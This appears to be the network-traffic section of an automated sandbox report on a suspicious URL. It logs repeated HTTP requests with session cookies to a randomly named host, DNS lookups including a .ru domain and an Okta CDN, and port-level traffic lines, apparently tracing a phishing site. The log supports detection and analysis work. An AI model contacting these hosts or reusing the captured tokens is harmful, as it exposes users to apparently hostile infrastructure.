laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opndtg8BsoD2DAlVS5p1xXKAfrATbUENUmswIUJEY471dstND65HtZdXwilCWmZOojFMWcd240 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnEAwRV8LurwKDnoqzC7tbr6QBNGuv7SezVu3ywnnBk8rAW90141 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klIGmhIzloSDNVZQ0fJEec8W4AE3cdKofOLl4zYRuZoxcL7s56170 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stQ7ya0zp2BTKt6FoeeP0Tdgw5L45w5SHIAfuB7BwQZNW0XV2dfD2qgLbweegh260 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxG0JrQPMlHU0nNYZc69rsYdteMSIMkC06HWwfr9Z1qASaab180 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opbd95W8u6CyERvfeIzCVlbOCPMoyRjo9N26ghrmaenMpLyLV5leABdyw2N64Xeccd193 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opndtg8BsoD2DAlVS5p1xXKAfrATbUENUmswIUJEY471dstND65HtZdXwilCWmZOojFMWcd240 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijgaYhnWUbVeOTmOpVDJTIXGh6Gy6z3kklsgKKUNsFxX4HupdpQJDsYmTgNfA76ef203 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stQ7ya0zp2BTKt6FoeeP0Tdgw5L45w5SHIAfuB7BwQZNW0XV2dfD2qgLbweegh260 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: 0cp.zlgbgfnebrnn.com
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: nzt0.kqnsgn.ru
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: unknownHTTP traffic detected: POST /report/v4?s=ChywVu%2Bh2WSFK70Xiw%2BE4KHICVe%2FsF3bExmhb5uysuABItdiPxmIhRldqaWSoWhMAomcwTWlJT58qBw6rK0WpGTDPK0zWhbT3Dt2COaS5B8LeJOm5HdjWS2Sf013 HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 438Content-Type: application/reports+jsonOrigin: https://0cp.zlgbgfnebrnn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 13:18:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: MISSAge: 19Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ChywVu%2Bh2WSFK70Xiw%2BE4KHICVe%2FsF3bExmhb5uysuABItdiPxmIhRldqaWSoWhMAomcwTWlJT58qBw6rK0WpGTDPK0zWhbT3Dt2COaS5B8LeJOm5HdjWS2Sf013"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=10025&min_rtt=9994&rtt_var=3770&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2242&delivery_rate=284970&cwnd=235&unsent_bytes=0&cid=39a1265883f1eefe&ts=34&x=0"Cache-Control: max-age=14400Server: cloudflareCF-RAY: 92985f899dd98c6c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=108325&min_rtt=103035&rtt_var=29688&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1907&delivery_rate=31285&cwnd=242&unsent_bytes=0&cid=4c7430ce4414dd3b&ts=358&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 13:18:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sC4B5UymJp2EsPdxT0sqqHHfloVdhSs5qExDGQUWQyVS%2FjshrdeAn7J4rij7mDDzh2tBhE5bqmf4Xcgo39BrHlNUdvux6mQhGqdaS0b65LJdxvgeJysSl2CW36Ja"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=9984&min_rtt=9963&rtt_var=2820&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2056&delivery_rate=284373&cwnd=105&unsent_bytes=0&cid=f84da04930cf8d9d&ts=339&x=0"Server: cloudflareCF-RAY: 92985fdf4b1d334e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=136505&min_rtt=134671&rtt_var=31167&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1721&delivery_rate=26567&cwnd=248&unsent_bytes=0&cid=d7e1621394d5475e&ts=757&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 13:18:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4vOZwWm9QgAF%2FrYI%2FPOtm5E2n68fhwGkx6Q7TTJYphm%2Fori1YwidGZfcbEwcK%2Fg4x9bz94HQ54uIYap2pY0%2BCkdFdnwcIFUJnu8tZFr7pQwrDQnArA8RZ7LXRmu%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=9963&min_rtt=9960&rtt_var=3741&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2059&delivery_rate=285227&cwnd=47&unsent_bytes=0&cid=e4b908c5922b559e&ts=334&x=0"Server: cloudflareCF-RAY: 92985fed7897da06-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114918&min_rtt=114749&rtt_var=24301&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1723&delivery_rate=32401&cwnd=251&unsent_bytes=0&cid=cd645335577f6c1f&ts=665&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
